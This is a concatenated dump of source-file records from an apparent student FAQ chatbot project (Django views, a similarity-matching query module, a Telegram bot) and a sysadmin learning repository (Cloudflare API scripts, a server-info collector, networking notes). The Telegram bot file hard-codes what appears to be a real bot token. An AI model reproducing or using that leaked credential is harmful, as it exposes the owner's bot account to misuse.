{}\n similarity_list = []\n\n for row in datarows:\n try:\n comparison_sentence_vector = np.reshape(row.vector, (1, -1))\n sim = cosine_similarity(comparison_sentence_vector, q.vector)[0][0]\n results.append(result(row.question, sim, row.interrogative, row.answer))\n # similarity_list.append(sim)\n except:\n print(\"RUH-ROH\")\n print(\"Subject 1: {}\".format(comparison_sentence_vector))\n print(\"Subject 2: {}\".format(q.vector))\n\n ## DEVSPACE\n results.sort(key=lambda x: x.sim, reverse=True)\n print('length of results:' + str(len(results)))\n # print(results.sim)\n # similarity_list.sort(reverse=True)\n # count = 1\n\n\n print('\\n')\n print(\"Input question: {}\".format(q.string))\n\n # No interrogative\n # if not q.interrogative:\n # print(\"NO INTERROGATIVE IDENTIFIED\")\n # # Check for relevant symptom datarow\n # i = 0\n # num_ans = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.7:\n # break\n\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # # Last part of line below is debatable\n # if (current_datarow.interrogative == 'symptom' or current_datarow.interrogative == 'what'):\n # print(\"[{:.4f}] Predicted question v1: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # num_ans+=1\n # i+=1\n # # Relevant datarow not found\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.6:\n # break\n\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # print(\"[{:.4f}] Potential question v2: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n # Have interrogative\n # else:\n # # Find datarow with correct interrogative\n # print(\"INTERROGATIVE IDENTIFIED: {}\".format(q.interrogative))\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.7:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # if current_datarow.interrogative == q.interrogative:\n # print(\"[{:.4f}] Potential question v3: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n # # No datarow with correct interrogative found, offer related datarows with strict criteria\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.8:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # print(\"[{:.4f}] Potential question v4: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n\n # similarity_list.remove(sim)\n # i+=1\n\n # # No datarow with correct interrogative found, offer symptoms\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.5:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # if current_datarow.interrogative == 'symptom':\n # print(\"[{:.4f}] Potential question v5: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n print(\"SEARCH OVER\")\n print(\"\\n\")\n\n if len(results) == 0:\n return {\"sim\": 0, \"answer\":random.choice(datarows).answer}\n\n else:\n # maxsim = max(prb)\n # idx = prb.index(maxsim)\n # ans = returnasw(quest[idx])\n\n seen_titles = set()\n new_results = []\n for obj in results:\n if obj.question not in seen_titles:\n new_results.append(obj)\n seen_titles.add(obj.question)\n\n maxsim = results[0].sim\n ans = results[0].answer\n print('ans: ' + ans) \n additionalRes = [x for x in new_results if x.sim > 0.5]\n return {\"sim\": maxsim, \"answer\":ans, 'additionalRes':additionalRes}\n\ndef returnasw(qn):\n for item in datarows:\n if item.question == qn:\n return item.answer\n return \"\"\n\n\nfrom nltk.corpus import wordnet as wn\n\ndef is_noun(tag):\n return tag in ['NN', 'NNS', 'NNP', 'NNPS']\n\ndef is_verb(tag):\n return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\n\ndef is_adverb(tag):\n return tag in ['RB', 'RBR', 'RBS']\n\ndef is_adjective(tag):\n return tag in ['JJ', 'JJR', 'JJS']\n\ndef penn_to_wn(tag):\n if is_adjective(tag):\n return wn.ADJ\n elif is_noun(tag):\n return wn.NOUN\n elif is_adverb(tag):\n return wn.ADV\n elif is_verb(tag):\n return wn.VERB\n return None\n\n\n#v1: no interrogative, have relevant SYMPTOM or WHAT QUESTION\n#v2: no interrogative, have relevant CONTENT\n#v3: have interrogative, correct interrogative found\n#v4: have interrogative, no correct interrogative found but have strictly relevant datarow\n#v5: have interrogative, no correct interrogative found but have relevant SYMPTOM\n\n#input_qn = question(\"What is Intangible Assets?\")\n#print(\"Predicted answer: \\t{}\".format(query(input_qn, debug=True)))\n"
},
{
"alpha_fraction": 0.6960784196853638,
"alphanum_fraction": 0.7352941036224365,
"avg_line_length": 26.81818199157715,
"blob_id": "9df7ff5464cd146383e62761e128de0e4d6c706f",
"content_id": "cf9c499c5b039dd233ee3520b9800bf97847fc4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/BC3409DEMO/main/models.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Database(models.Model):\n\n question = models.CharField(max_length=2000, blank=False)\n answer = models.CharField(max_length=2000, blank=False)\n interrogative = models.CharField(max_length=2000, blank=False)\n app_label = 'Database'\n\n# Create your models here.\n"
},
{
"alpha_fraction": 0.6853932738304138,
"alphanum_fraction": 0.6853932738304138,
"avg_line_length": 21.25,
"blob_id": "a993a3d1edbc34d809b7f847efbc071c96a04dc9",
"content_id": "0925ca7cd537a06cc65f67d104daa5d598313953",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 20,
"path": "/BC3409DEMO/main/admin.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Database\n\n# Register your models here.\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('pk', 'question', 'answer')\n list_filter = ('question', 'answer')\n search_fields = ['pk', 'question', 'answer']\n\n def account_query(self, obj):\n return obj.account\n\n account_query.admin_order_field = 'account_query'\n\n pass\n\n\nadmin.site.register(Database, DatabaseAdmin)\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6524063944816589,
"avg_line_length": 27.049999237060547,
"blob_id": "47f6463851228802f2635ca7ff8b35440d3faff8",
"content_id": "8e2e1becaa5fc7ec62ae30687dbb9994a120317f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/BC3409DEMO/importing.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "import csv\nfrom datetime import datetime\nfrom main.models import Database\n\nDatabase.objects.all().delete()\nwith open('question.csv', 'r') as csvfile:\n reader = csv.DictReader(csvfile)\n\n for row in reader:\n question = list(row.values())[0]\n print(question)\n answer = list(row.values())[1]\n print(answer)\n interrogative = list(row.values())[2]\n print(interrogative)\n\n new_db = Database(question=question, answer=answer, interrogative=interrogative)\n new_db.save()\n\n# exec(open('importing.py').read())\n"
},
{
"alpha_fraction": 0.6129032373428345,
"alphanum_fraction": 0.6524926424026489,
"avg_line_length": 21,
"blob_id": "c7177bdd2d8ebc15c25ce6356ee130c3491ceca3",
"content_id": "94c728ce29f65b31b283c2be79554e6524a68eeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/Telegram/main.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\nimport telepot\nimport time\nfrom slugify import slugify\nimport requests\nbot = telepot.Bot('1003067694:AAFxSzzj4y_fl-5OcJPDeOSoEkzANknuqyY')\nurl = \"http://127.0.0.1:8000/ask/\"\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(content_type, chat_type, chat_id)\n\n if content_type == 'text':\n\n slug = slugify(msg[\"text\"])\n\n ans = requests.get(url + slug).json()\n\n #bot.sendMessage(chat_id, \"slugify '{}'\".format(slug))\n\n bot.sendMessage(chat_id, \"Answer:\\n\"+\" '{}'\".format(ans['answer']))\n\n\nbot.message_loop(handle)\n\nprint('Listening ...')\n\n# Keep the program running.\nwhile 1:\n time.sleep(10)\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 21.5,
"blob_id": "f484a308c0a3d60ed937ba492d86583953355782",
"content_id": "94ba7137f51886b603c19a51f7319c21f096480e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/README.md",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "# BC3409-chatbot\n financial literacy chatbot\n"
},
{
"alpha_fraction": 0.5359628796577454,
"alphanum_fraction": 0.5870069861412048,
"avg_line_length": 21.6842098236084,
"blob_id": "65e8d395420da6de837f3ddf762a59fc71fd2c95",
"content_id": "79f9db0f979a1f88ae631df6b378534254b224f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 19,
"path": "/BC3409DEMO/main/migrations/0002_database_interrogative.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2 on 2019-04-13 13:42\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='database',\n name='interrogative',\n field=models.CharField(default='what', max_length=2000),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5984450578689575,
"alphanum_fraction": 0.603908360004425,
"avg_line_length": 29.902597427368164,
"blob_id": "eb4e8b6c7d1a5d6a2930726f7958b51f3debf975",
"content_id": "dbe0a01295d75023e10138bb09cbc3a88001befb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4759,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 154,
"path": "/BC3409DEMO/main/views.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "import csv\nimport numpy as np\nimport time\nimport warnings\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\n\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.shortcuts import render, render_to_response\nfrom django.shortcuts import render\nimport main\n\nfrom django.http import HttpResponse\nimport simplejson as json\n\n# Create your views here.\n# import it\nfrom django.http import JsonResponse\n\nfrom .models import Database\n\nimport pandas as pd\n\n# Vector comparison module\nimport os\nfrom . import query\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport simplejson as json\nfrom django.http import HttpResponse\nimport csv\n# Create your views here.\n# import it\nfrom django.core.mail import send_mail\n\nfrom django.http import JsonResponse\nsize = 0\n\ndef askchatbot(request, slug):\n # global question_to_vector\n # global question_to_answer\n # global vector_to_question\n global additionalRes\n\n # do something with the your data\n print('System is processing your question...')\n unslug = slug.replace(\"-\", \" \")\n print('query content: ' + unslug)\n result = Database.objects.all().values()\n df = pd.DataFrame(result)\n\n if unslug == ('y' or 'Y'):\n print('enter yes')\n response_data = {'answer': 'Ask me another question if you want'}\n\n elif unslug == ('n' or 'N') and len(additionalRes)>0:\n print('enter no')\n addQn = ''\n i = 1\n for res in additionalRes:\n if i > 10:\n break\n addQn += str(i) + ': ' + res.question + '\\n'\n i += 1\n print(addQn)\n\n response_data = {'answer': 'Do you mean any of the questions below: \\n' + addQn + '\\nPlease enter question number to see the answer'}\n\n elif unslug.isdigit() and len(additionalRes)>0:\n print('enter qns selection')\n index = int(unslug)\n print(index)\n selection = additionalRes[index-1]\n print(selection)\n response_data = {'answer': selection.answer + '\\n\\nKey in another question number to see more answer or ask me a new question'}\n\n else:\n if size == df.shape[0]:\n pass\n else:\n query.load_csv_into_memory(df)\n # response = HttpResponse (content_type='text/csv')\n # writer = csv.writer(open(\"qna.csv\", \"w\", encoding='utf-8',newline=''))\n # for item in Database.objects.values_list('question','answer'):\n # writer.writerow(item)\n # question_to_vector, question_to_answer, vector_to_question = load_csv_into_memory(\"C:\\\\Users\\\\KangYu\\\\Desktop\\\\BC3409\\\\BC3409DEMO\\\\qna.csv\",\"utf-8\")\n input_qn = query.question(unslug)\n result = query.query(input_qn, True)\n additionalRes = result['additionalRes']\n\n if result[\"sim\"] < 0.5:\n response_data = {'answer': \"Answer may not be what you want but we are working on it!\\n\" + result[\"answer\"]}\n\n send_mail(\n 'UNKNOWN QN REPLY ASAP',\n unslug,\n '[email protected]',\n ['[email protected]'],\n fail_silently=False,\n )\n\n response_data = {'answer': result[\"answer\"] + '\\n\\nIs this what you want?\\nkey in Y for Yes to answer another question\\nkey in N for No to view similar questions.'}\n\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\n@csrf_exempt\ndef get_response(request):\n response = {'status': None}\n\n if request.method == 'POST':\n data = json.loads(request.body)\n message = data['message']\n\n result = Database.objects.all().values()\n df = pd.DataFrame(result)\n\n if size == df.shape[0]:\n pass\n else:\n query.load_csv_into_memory(df)\n\n input_qn = query.question(message)\n result = query.query(input_qn, True)\n\n if result[\"sim\"] < 0.5:\n chat_response = {'answer': \"Answer may not be what you want but we are working on it!\\n\" + result[\"answer\"]}\n send_mail(\n 'UNKNOWN QN REPLY ASAP',\n message,\n '[email protected]',\n ['[email protected]'],\n fail_silently=False,\n )\n\n else:\n chat_response = {'answer': result[\"answer\"]}\n\n\n response['message'] = {'text': chat_response[\"answer\"], 'user': False, 'chat_bot': True}\n response['status'] = 'ok'\n\n else:\n response['error'] = 'no post data found'\n\n return HttpResponse(\n json.dumps(response),\n content_type=\"application/json\"\n )\n\n\ndef home(request, template_name=\"home.html\"):\n context = {'title': 'Chatbot Version 1.0'}\n return render_to_response(template_name, context)\n"
}
] | 8 |
denkovade/sysadm | https://github.com/denkovade/sysadm | af2c8d750e469e58dd1205dba610aff9b263d6e1 | 3d3226f854217639229fac82ff66cbec9db8fb66 | c91fb827bdbe36e46226514420805657154c8d73 | refs/heads/master | 2021-01-02T08:24:00.126837 | 2018-06-05T08:21:33 | 2018-06-05T08:21:33 | 99,002,687 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8121212124824524,
"alphanum_fraction": 0.8121212124824524,
"avg_line_length": 81.5,
"blob_id": "d4f27b266ca9e9a1cbeb9940c668ec5593780bed",
"content_id": "b556aa1eaf143aca350635052d755a0ec276487a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 2,
"path": "/README.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# sysadm\nthis repo has been created for my sysadmin learning stuff - notes from books,documentation,scripts and everything what I need in my work and daily training\n"
},
{
"alpha_fraction": 0.7042514085769653,
"alphanum_fraction": 0.709796667098999,
"avg_line_length": 23.636363983154297,
"blob_id": "76a916c42b3081bfa3830ffcbb243fe2227dade2",
"content_id": "17fe6c468d5fd994c4cf833eddd693d764e2d03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 22,
"path": "/linux_networking.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# configuring the network\n## Static vs Dynamic:\n* DHCP\n\t* can be statically mapped\n\t* can set hostname\n*Static\n\t* more work to change\n\t* one less point of failure\n## static configuration steps:\n1. set ip -> /etc/sysconfig/network-scripts\n\t* set to static\n2.set gateway ->/etc/sysconfig/network\n\t* and hostname\n\t*/etc/hosts\n3. set dns -> /etc/resolv.conf\n\n# iptables -> configure linux firewall\n- kernel level\n- specifies traffic comming and going\n- is how we do NAT\n```system-confi-firewall-tui``` <br />\n```/etc/sysconfig/iptables``` <br />"
},
{
"alpha_fraction": 0.7325692176818848,
"alphanum_fraction": 0.7491244673728943,
"avg_line_length": 63.081634521484375,
"blob_id": "4407abc843f58ed2718cee639976fb3783947f39",
"content_id": "c3ba13d90d831d84ec43ca2a25f465921c52c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 49,
"path": "/networking.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# OSI and TCP model\n\n| TCP/IP\t | OSI | Explanation | Protocols |\n|---|---|---|---|\n| Process/ | Application | The Application layer provides services to the software through which the user requests network services. Browsers and FTP client are part of this layer. | FTP, SMTP, POP3, HTTP, TFTP, SSH, DNS, DHCP, NTP, SNMP, Telnet |\n| | Presentation | This layer is concerned with data representation and code formatting. | SSL, TLS, ASCII, MPEG |\n| Application | Session | The Session layer establishes, maintains, and manages the communication session between computers. | NetBIOS, SIP |\n| Host to host | Transport | The functions defined in this layer provide for the reliable transmission of data segments, as well as the disassembly and assembly of the data before and after transmission. | TCP,UDP, RTP |\n| Internet | Network | This is the layer on which routing takes place, and, as a result. It defines the processes used to route data across the network and the structure and use of logical addressing. | IP, BGP, RIP |\n| Network | Data Link | this layer is concerned with the linkages and mechanisms used to move data about the network, including the topology, such as Ethernet or Token Ring, and deals with the ways in which data is reliably transmitted. | Ethernet, Token Ring, PPP |\n| Access | Physical | This layer defines the electrical and physical specifications for the networking media that carry the data bits across a network. | ISDN, DSL, 100Base-Tx |\n\n# TCP model explanations\n- Application Layer: Represents data to the user plus encoding and dialog control\n- Transport Layer: Supports communication between divers devices accrose diverse networks.\n- Internet Layer: Determines the best path through the network\n- Network Accesss Layer: Controls the hardware devices and media that make up the network\n\n# Ports\n|port number range | port group |\n|---|---|\n| 0 to 1023 | well known (contact) port |\n| 1024 to 49151 | registered ports |\n| 49152 to 65535 | private and/or dynamic ports |\n\n# Common TCP port number\nSSH = 22\nTelnet - 23\nDNS = 53\nSMTP = 25\nHTTP = 80\nHTTPS = 443\n\n# Common TCP port number\nDNS = 53\nNTP = 123\nTFTP = 69\n\n- *Data Encapsulation* - each lower layer append its header to the data prior to sending it to the lower layer\n- *Connection - Oriented* - reliable data transfer method that uses acknowledgements ad flow control. An example is TCP\n- *Connectionless-Oriented* - Non reliable best efort data transfer metod with very little overhead. An example is UDP\n- *Socket Number* - combination of IP address and port number defining a source or destination\n- *Port Number* - uniue identifier for both( TCP/UDP) at the transport layer\n\n# Tipical Network Devices\n- Hub - connect multiple devices together making them act as one network segment sing shared bandwidth\n- Switch - connects multiple devices rogether providing host with dedicated bandwith (work on layer 2)\n- Bridge - similar to a switch but has less ports and is software based\n- Router - connect two or more logical subnets providing path selection and packet switching ( work on layer 3,2,1)\n\n"
},
{
"alpha_fraction": 0.48571428656578064,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 10.333333015441895,
"blob_id": "55c939e034e6a577d2f30395ab0a9b9d9a806c3d",
"content_id": "7810ac30de6ec136c8a6aa7afefa318feee7efab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/scripting/test.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "print 5\nprint 'x = 5'\nprint \"x+1\"\n\n"
},
{
"alpha_fraction": 0.6621004343032837,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 42.79999923706055,
"blob_id": "478c73d3db2ba380119dc79f8a186f9750ebb11b",
"content_id": "e0269262db9ddcfd7f56208bc3b7f2d9f4fda01b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 10,
"path": "/add_domains.sh",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#add domains in CF via txt file which is using domain_list.txt \n#fill email and key from your account in variables below\nCF_API_EMAIL=\"\"\nCF_API_KEY=\"\"\nfor domain in $(cat domain_list.txt); do \\\n curl -s -X POST -H \"X-Auth-Key: $CF_API_KEY\" -H \"X-Auth-Email: $CF_API_EMAIL\" \\\n -H \"Content-Type: application/json\" \\\n \"https://api.cloudflare.com/client/v4/zones\" \\\n --data '{\"name\":\"'$domain'\",\"jump_start\":true}' | jq; done\n"
},
{
"alpha_fraction": 0.6161859035491943,
"alphanum_fraction": 0.6177884340286255,
"avg_line_length": 48.91999816894531,
"blob_id": "1be4c412a3e0a7056461758defbb2044030df714",
"content_id": "c6dab8fd8de20fc249222c98f2e8f0ff01c68d5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1248,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 25,
"path": "/add_dns_records.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# this script is using to add dns records in CF ( CloudFlare account) using file domains-with-id.txt\n#IP_address - add IP adres to point\n#X-Auth-Email: add email which you are using to autenticate in CF (this info you can take from you CF account)\n# X-Auth-Key: add authentification key (this info you can take from you CF account)\nimport subprocess\n\n\ndef main(): \n\tf = open(\"domains-with-id.txt\", \"r\")\n\tfor l in f:\n\t\tif not l.strip():\n\t\t\tcontinue\n\n\t\tdomain, ident = [i.strip() for i in l.split(\" \")]\n\t\tp = [\"curl\", \"-s\", \"-X\", \"POST\", \"https://api.cloudflare.com/client/v4/zones/%s/dns_records\" % ident, \"-H\", \"X-Auth-Email: c\" , \"-H\", \"X-Auth-Key: \" , \"-H\", \"Content-Type: application/json\" , \"--data\" , '{\"type\":\"A\",\"name\":\"%s\",\"content\":\"IP_address\",\"proxied\":true}' % domain]\n\t\tprint \"Executing: %s\" % \" \".join(p)\n\t\tsubprocess.Popen(p).wait()\n\t\tp = [\"curl\", \"-s\", \"-X\", \"POST\", \"https://api.cloudflare.com/client/v4/zones/%s/dns_records\" % ident, \"-H\", \"X-Auth-Email: \", \"-H\", \"X-Auth-Key: \", \"-H\" , \"Content-Type: application/json\", \"--data\" , '{\"type\":\"CNAME\",\"name\":\"www\",\"content\":\"%s\",\"proxied\":true}' % domain]\n\t\tprint \"Executing: %s\" % \" \".join(p)\n\t\tsubprocess.Popen(p).wait()\n\n\nif __name__ == '__main__':\n\tmain()\n"
},
{
"alpha_fraction": 0.6677631735801697,
"alphanum_fraction": 0.6973684430122375,
"avg_line_length": 32.88888931274414,
"blob_id": "619459332f69e0acfd81572340b662ed8a8960ae",
"content_id": "56efbba32488ea1143fe7eb1c2bc9a7d6fff7b3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 9,
"path": "/scripting/learning_python/python_research_notes.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# Charters\n\n[x] Script hello.py (from Automate Boring stuff with python) working correct with python 3 insted of python 2.7\n\n**explore:** function input() doesnt work with python 2.7\n\n**to:** change script to work with python 2.7\n\n**solution:** in python 2.7 use ```raw_input()``` insted of ```input()```"
},
{
"alpha_fraction": 0.5097001791000366,
"alphanum_fraction": 0.5139833688735962,
"avg_line_length": 28.399999618530273,
"blob_id": "57ff3b966dc20e6ecc1b398618adcd889f486c3e",
"content_id": "3dd754ca05d34337f10e0a3a7b65e4deabaa39d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3969,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 135,
"path": "/scripting/system_info_srv.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#this script will collect information from our servers\n#-*- coding: utf-8 -*\n \n \nimport os\nimport sys\nfrom argparse import ArgumentParser\nimport glob\nimport subprocess\n \n \nPROFILES = {\n \"basic\": {\n \"files\": [\n '/etc/resolv.conf',\n '/etc/redhat-release',\n '/etc/postfix/*.cf',\n '/usr/sbin/*.sh',\n '/var/lib/jenkins/jobs/*/config.xml',\n '/etc/httpd/conf.d/*',\n '/etc/my.cnf',\n '/etc/bacula/bat.conf',\n '/etc/exports'\n ],\n\n \"commands\": [\n ['ifconfig' ,'-a'],\n ['crontab', '-l'],\n ['uname', '-a'],\n ['iptables','-L']\n ['docker','ps','-all'],\n ['docker', 'images'],\n ['df','-hT'],\n ['fdisk', '-l'],\n ['lscpu']\n ]\n }\n\n\n }\n\n \"centos\":{\n \"files\":[\n '/etc/mysql/*.conf',\n ],\n\n \"commands\":[\n ['chkconfig']\n ['sestatus','v']\n ['getsebool''a']\n ]\n \n }\n\ndef get_info_from_files(output_file_handler, files_to_look_for):\n delim = \"=\" * 40 + \"\\n\"\n delim2 = \"-\" * 40 + \"\\n\"\n for f in files_to_look_for:\n print \"Info: Working on: %s\" % f\n # Write the expected file name in the output file\n output_file_handler.write(\"Working on file: %s\\n\" % f)\n output_file_handler.write(delim)\n output_file_handler.write(\"\\n\"*5)\n \n gf = glob.glob(f)\n if(not gf):\n print >> sys.stderr, \"Warining: No files for %s\" % f\n for g in gf:\n print \"Info: Working on file after glob: %s\" % g\n output_file_handler.write(\"Working on after glob: %s\\n\" % g)\n output_file_handler.write(delim2)\n output_file_handler.write(\"\\n\"*5)\n try:\n o = open(g, 'r').read()\n output_file_handler.write(o)\n except IOError, err:\n print >> sys.stderr, \"Warning: File %s could not be read: %s\" % (g, str(err).strip())\n output_file_handler.write(\"\\n\"*5)\n \n \ndef get_info_from_commands(output_file_handler, commands):\n delim = \"=\" * 40 + \"\\n\"\n for c in commands:\n print \"Info: Executing Command: %s\" % \" \".join(c)\n # Write the expected file name in the output file\n output_file_handler.write(\"Command: %s\\n\" % \" \".join(c))\n output_file_handler.write(delim)\n output_file_handler.write(\"\\n\"*5)\n \n p = subprocess.Popen(c, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n so, se = p.communicate()\n rc = p.returncode\n if(rc != 0):\n print >> sys.stderr, \"Warning: Command %s failed with %i:\\n Error message: %s\" % (\" \".join(c), rc, se.strip())\n else:\n output_file_handler.write(so)\n \n output_file_handler.write(\"\\n\"*5)\n \n \ndef get_args(profiles):\n parser = ArgumentParser(description=\"This is useful script and shows how to use option parser\")\n \n parser.add_argument(\"-o\", \"--output-file\",\n help=\"File to write the data in\")\n parser.add_argument(\"-p\", \"--profile\",\n choices=[i for i in profiles],\n default=[i for i in profiles][0],\n help=\"Choose from a predefined set of commands and files for particular purpose\")\n \n args = parser.parse_args()\n \n if(not args.output_file):\n print >> sys.stderr, \"Error: You have to supply --output-file\"\n sys.exit(1)\n \n return args\n \n \ndef main():\n args = get_args(PROFILES)\n \n output_file = os.path.abspath(args.output_file)\n profile_name = args.profile\n \n print \"Running Profile: %s\" % profile_name\n \n with open(output_file, 'w') as o_f:\n get_info_from_files(o_f, PROFILES[profile_name][\"files\"])\n get_info_from_commands(o_f, PROFILES[profile_name][\"commands\"])\n \n \nif(__name__ == \"__main__\"):\n main()\n"
},
{
"alpha_fraction": 0.7363184094429016,
"alphanum_fraction": 0.746268630027771,
"avg_line_length": 38.79999923706055,
"blob_id": "591a242edd8fd2139d3a7b9e37cd3cb23e931cd5",
"content_id": "64965d087757b74bf344670cdd2cceff507283b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 5,
"path": "/python27_official_docs_notes.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "Python 2.7 official documentation notes\n======\n* python is:\n\t* dynamically typed -> doesn't use explicit datatype declarations\n\t* stringly typed -> once a variable has a datatype it actually matters\n\t\n"
},
{
"alpha_fraction": 0.6460674405097961,
"alphanum_fraction": 0.6460674405097961,
"avg_line_length": 22.733333587646484,
"blob_id": "f7c5f2d1411452f7514466fb2de519257f209505",
"content_id": "9131613c2e3072067641c4a87504ecfc02841a46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 15,
"path": "/parse_moved.py",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#this file tmp-cf.txt content information in json format from CloudFlare account\n#parse information from txt file and print domain with status\n\nimport json\n\n\ndef main():\n\tmoved = json.load(open(\"tmp-cf.txt\", \"r\"))\n\tfor i in moved[\"result\"]:\n\t\tprint \"%s %s %s\" % (i[\"name\"], i[\"id\"], i[\"status\"])\n\n\nif __name__ == '__main__':\n\tmain()\n"
},
{
"alpha_fraction": 0.6738070249557495,
"alphanum_fraction": 0.6873806715011597,
"avg_line_length": 31.73611068725586,
"blob_id": "ea184b5df22e44ce299230614380f82bebeb9fd6",
"content_id": "2aa433bd3b67e89e1892e286aed6f997acb02e00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4715,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 144,
"path": "/linux.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
